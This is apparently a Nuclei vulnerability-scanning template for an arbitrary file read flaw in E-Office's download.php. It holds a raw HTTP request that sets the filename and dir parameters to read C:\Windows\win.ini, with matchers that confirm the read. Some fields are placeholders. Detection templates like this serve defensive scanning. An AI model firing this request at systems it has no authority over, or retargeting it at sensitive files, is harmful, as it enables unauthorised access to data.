id: download_any_file
info:
  name: E-Office download.php任意文件读取漏洞
  author: weehhd
  severity: high
  description: https://mp.weixin.qq.com/s/Qjhi5m6OSXv9L9fDhN7biQ
  reference:
    - https://
  tags: tags
http:
  - raw:
      - |+
        GET /general/file_folder/file_new/neworedit/download.php?filename=win.ini&dir=C:\\Windows\\ HTTP/1.1
        Host: {{Hostname}}
        Pragma: no-cache
        Cache-Control: no-cache
        Upgrade-Insecure-Requests: 1
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
        Accept-Encoding: gzip, deflate
        Accept-Language: zh-CN,zh;q=0.9,en-CN;q=0.8,en;q=0.7
        Cookie: PHPSESSID=86298f9876dddefbfb4d78d40f9a2d0c
        Connection: close

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '[fonts]'
      - type: word
        part: header
        words:
          - HTTP/1.1 200 OK
